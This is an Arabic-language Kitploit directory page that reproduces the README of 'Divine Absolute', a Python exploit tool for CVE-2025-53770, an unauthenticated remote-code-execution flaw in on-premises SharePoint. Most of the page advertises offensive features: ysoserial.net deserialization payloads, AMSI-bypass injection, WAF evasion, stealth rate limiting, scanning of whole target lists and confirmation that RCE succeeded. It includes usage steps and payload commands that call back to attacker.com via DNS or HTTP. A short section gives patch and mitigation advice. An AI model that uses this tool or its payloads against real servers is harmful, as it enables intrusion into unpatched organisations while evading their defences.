Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-53770 — أداة استغلال متطورة موجهة بمعالج (Wizard) تستهدف CVE-2025-53770، وهي ثغرة حرجة (CVSS 9.8) لتنفيذ الأكواد عن بُعد (RCE) دون مصادقة في Microsoft SharePoint Server المحلي (2016 و2019 وSubscription Edition) | Kitploit
أدوات/GitHubGitHub/exfil0/cve-2025-53770
تصعيد الامتيازاتالاستطلاعتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرة
GitHubexfil0/cve-2025-53770
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-53770

أداة استغلال متطورة موجهة بمعالج (Wizard) تستهدف CVE-2025-53770، وهي ثغرة حرجة (CVSS 9.8) لتنفيذ الأكواد عن بُعد (RCE) دون مصادقة في Microsoft SharePoint Server المحلي (2016 و2019 وSubscription Edition)

عرض المستودع

Divine Absolute - أداة استغلال CVE-2025-53770

License
Python

نظرة عامة

Divine Absolute هي أداة استغلال متطورة بلغة بايثون تعمل بمعالج تفاعلي (wizard) تستهدف CVE-2025-53770، وهي ثغرة حرجة (CVSS 9.8) تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة في Microsoft SharePoint Server المحلي (إصدارات 2016 و2019 وSubscription Edition). تم الكشف عن هذه الثغرة كيوم صفري في 19 يوليو 2025، وتنتج عن إلغاء تسلسل بيانات غير موثوقة في /_layouts/15/ToolPane.aspx. صُممت الأداة لاختبار الاختراق الأخلاقي والبحث الأمني المصرح به فقط، وتوفر دقةً وتخفيًا وقابلية تكيف لا مثيل لها للاستطلاع والاستغلال والتحقق.

المستودع: https://github.com/exfil0/CVE-2025-53770

⚠️ تحذير قانوني: هذه الأداة مخصصة للاستخدام القانوني والمصرح به فقط في بيئات خاضعة للسيطرة وبإذن صريح. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها غير قانوني وقد يؤدي إلى عواقب قانونية خطيرة. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.

الميزات

  • الأنماط:
    • الاستطلاع (Recon): يكتشف وجود SharePoint والإصدار وإمكانية الوصول إلى ToolPane.aspx مع تسجيل نقاط متقدم وتعبيرات نمطية (مثل 16.0.0.\d+-\w+?).
    • الاستغلال (Exploit): يسلّم الحمولات عبر ToolPane.aspx مع تجاوزات قوية.
    • الكامل (Full): يجمع بين الاستطلاع والاستغلال، مع خيار استغلال عدواني اختياري.
  • توليد الحمولات:
    • يدمج ysoserial.net لتوليد حمولات إلغاء تسلسل .NET (مثل ObjectDataProvider وLosFormatter).
    • pythonnet اختياري لحمولات pingback عبر HTTP/DNS احتياطية (مثل WebRequest.Create, Dns.GetHostEntry).
    • يدعم ضغط GZIP مع ترميز/فك ترميز صريح والتحقق من base64.
    • يحقن تجاوزات AMSI (انعكاس أساسي أو مشوش أو مقاطع مخصصة) في أوامر PowerShell، بما في ذلك الحمولات المشفرة بـ base64 (-enc).
  • التجاوزات:
    • مراوغة URI: لاحقات عشوائية أو ثابتة (مثل /xp.aspx أو قائمة على UUID).
    • تزييف Referer: بدون، نطاقات خارجية (مثل www.google.com)، عناوين URL مخصصة، أو مسارات SharePoint داخلية (مثل /_layouts/15/sharepoint.aspx).
  • التخفي:
    • تحديد معدل متكيف مع حد أدنى لـ RPS (0.01) والتحكم في الاندفاعات.
    • توازٍ آمن للخيوط مع ضبط محمي بالأقفال وتذبذب (0-0.1 ثانية).
  • التحقق:
    • تأكيد قوي لـ RCE بتعبيرات نمطية OR مجمّعة، وإعادة محاولة عند RequestException, ورموز/مسارات حالة قابلة للتخصيص.
  • الاستطلاع:
    • كشف محسّن لـ SharePoint عبر الترويسات (مثل MicrosoftSharePointTeamServices), والمسارات (مثل /versions.aspx), والتعبيرات النمطية.
  • المخرجات:
    • نتائج بصيغة JSON مع تسجيل جنائي للتحليل.
  • سهولة الاستخدام:
    • معالج تفاعلي لسهولة الإعداد.
    • دعم Mono/Wine لتشغيل ysoserial.net على الأنظمة غير المبنية على Windows.
    • دعم البروكسي (HTTP/SOCKS5) ومهل زمنية قابلة للتخصيص.

سياق CVE-2025-53770

  • الثغرة: RCE بدون مصادقة عبر إلغاء التسلسل في /_layouts/15/ToolPane.aspx.
  • المتأثر: SharePoint Server 2016 و2019 وSubscription Edition (الإصدارات 2010/2013 المنتهية الدعم معرضة أيضًا).
  • غير المتأثر: SharePoint Online (M365).
  • الاستغلال: منذ 18 يوليو 2025 في حملات مثل "ToolShell" من جهات ترعاها دول (مثل Linen Typhoon).
  • التصحيحات: تصحيحات Microsoft (مثل KB5002768 وKB5002754) الصادرة في 19 يوليو 2025 تخفف بالكامل. قائمة CISA KEV تلزم الجهات الفيدرالية بتطبيق التصحيح بحلول 21 يوليو 2025.
  • التخفيف: التحديث، وتدوير المفاتيح بعد التحديث، وتفعيل AMSI/Defender (الوضع الكامل)، ومراقبة طلبات POST إلى /ToolPane.aspx, واستخدام قواعد WAF (مثل Cloudflare).

التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • التبعيات:
    root@kitploit:~
    pip install requests termcolor
    
  • اختياري (للاستعادة الاحتياطية لتسلسل .NET):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • قم بالتنزيل من إصدارات ysoserial.net.
    • ضع ysoserial.exe في مسار معروف (مثل ./ysoserial.exe).
  • Mono/Wine (للأنظمة غير المبنية على Windows):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
    
  • مختبر Docker (موصى به للاختبار):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

الإعداد

  1. استنساخ المستودع:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. تثبيت تبعيات بايثون:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. تأكد من أن ysoserial.exe يمكن الوصول إليه أو وفّر مساره أثناء التنفيذ.
  4. (اختياري) تحقق من Mono/Wine للأنظمة غير المبنية على Windows.

الاستخدام

شغّل المعالج التفاعلي:

root@kitploit:~
python divine_absolute.py

سير العمل

  1. اختيار الوضع:
    • Recon: يفحص وجود SharePoint والإصدار.
    • Exploit: يرسل الحمولة إلى ToolPane.aspx.
    • Full: استطلاع + استغلال (مع وضع عدواني اختياري).
  2. إدخال الهدف:
    • عنوان URL واحد (مثل https://sharepoint.example.com).
    • ملف يحتوي على عناوين URL (واحد في كل سطر).
  3. إعداد الحمولة:
    • ysoserial.net: حدد المسار والأداة (gadget) (مثل ObjectDataProvider) والأمر (مثل cmd /c whoami).
    • ملف: تحميل حمولة base64 GZIP من ملف.
    • سلسلة نصية: إدخال حمولة base64 GZIP مباشرة.
    • Pingback: توليد pingback عبر HTTP/DNS (مثل http://attacker.com/callback أو sub.attacker.com).
    • تجاوز AMSI: اختر NONE أو BASIC_REFLECTION أو أو مقطعًا مخصصًا.

أمثلة على الأوامر

  • الاستطلاع:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Recon, Target=https://sharepoint.example.com
    
  • الاستغلال باستخدام ysoserial.net:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • الوضع الكامل مع التحقق:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • Pingback عبر DNS:
    root@kitploit:~
    python divine_absolute.py
    # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

المخرجات

تُحفظ النتائج في xanthorox_results.json بالحقول التالية:

  • target: العنوان الذي تم اختباره.
  • sharepoint_detected: قيمة منطقية (Boolean).
  • toolpane_accessible: قيمة منطقية (Boolean).
  • exploited: قيمة منطقية (تم إرسال الحمولة).
  • verified_rce: قيمة منطقية/لا شيء (تم تأكيد RCE).
  • error: أي أخطاء واجهتها.

مثال:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

التحسينات المُعالجة

يصلح هذا الإصدار:

  • تحديد المعدل التكيفي: يتجاهل أخطاء عدم إعادة المحاولة (مثل 404) عند حساب النجاح/الخطأ؛ ويفرض حدًا أدنى لـ RPS (0.01).
  • حقن AMSI: يفك ترميز الحمولات المشفرة بـ base64 ويحقن التجاوزات في أوامر PowerShell (-enc)؛ ويدعم غير PowerShell (مثل cmd.exe) مع تحذيرات.
  • الاستعادة الاحتياطية عبر Pingback: يستخدم pythonnet لإجراء pingback موثوق عبر DNS باستخدام Dns.GetHostEntry (تجريبي، ويتطلب gadget للحصول على التأثير الكامل).

توصيات الاختبار

  • إعداد المختبر: استخدم حاوية Docker لـ SharePoint Server 2019 (بدون تصحيح) لإجراء اختبارات آمنة.
  • اختبار WAF: تحقق من التجاوزات ضد Cloudflare أو حلول WAF مماثلة مع RPS تكيفي.
  • اختبار الحمولات: ولّد حمولات باستخدام ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 وتحقق من سجلات DNS.

القيود المعروفة

  • موثوقية Pingback: قد لا يعمل Dns.GetHostEntry في pythonnet بدون سلسلة gadget محددة.
  • الأوامر المعقدة: قد تتطلب أوامر PowerShell غير القياسية حقن تجاوز AMSI يدويًا.
  • اكتشاف WAF: قد تحجب بعض جدران حماية تطبيقات الويب (WAF) الحمولات رغم التجاوزات؛ اختبر بدقة.

المساهمة

المساهمات مرحب بها! يرجى:

  1. انسخ المستودع (Fork).
  2. أنشئ فرع ميزة (git checkout -b feature/awesome-improvement).
  3. نفّذ التغييرات (git commit -m "Add awesome improvement").
  4. ادفع إلى الفرع (git push origin feature/awesome-improvement).
  5. افتح طلب سحب (Pull Request).

الرخصة

هذا المشروع مرخص بموجب رخصة MIT. راجع LICENSE للتفاصيل.

الشكر والتقدير

  • xAI: لإلهام أبحاث أمنية متطورة.
  • فريق ysoserial.net: لمولّد حمولات إلغاء تسلسل .NET.
  • المجتمع الأمني: لتقديم رؤى حول استغلال CVE-2025-53770 وتخفيفه.

الاتصال

  • المؤلف: @exfil0
  • القضايا: GitHub Issues
  • تيليجرام: https://t.me/GOTOCVE

ملاحظة: تحقق دائمًا من الحمولات والإعدادات في مختبر مُتحكم به قبل الاستخدام. كن أخلاقيًا وملتزمًا بالقانون.

تنزيل الأداة
CONCAT_OBFUSCATED
  • خيارات التجاوز:
    • URI: NONE أو FIXED (مثل /xp.aspx) أو RANDOM (قائم على UUID).
    • Referer: DEFAULT_SP أو NO_REFERER أو RANDOM_EXTERNAL أو CUSTOM_URL.
  • إعدادات الشبكة:
    • البروكسي (مثل http://127.0.0.1:8080).
    • عدد الخيوط والمهلة والتذبذب والحد الأقصى للمعدل (RPS).
  • التحقق من RCE:
    • حدد المسار (مثل /sitepages/result.txt), والتعبيرات النمطية (مثل Xanthorox.*), ورموز الحالة (مثل 200,403), والمحاولات والتأخير والمهلة.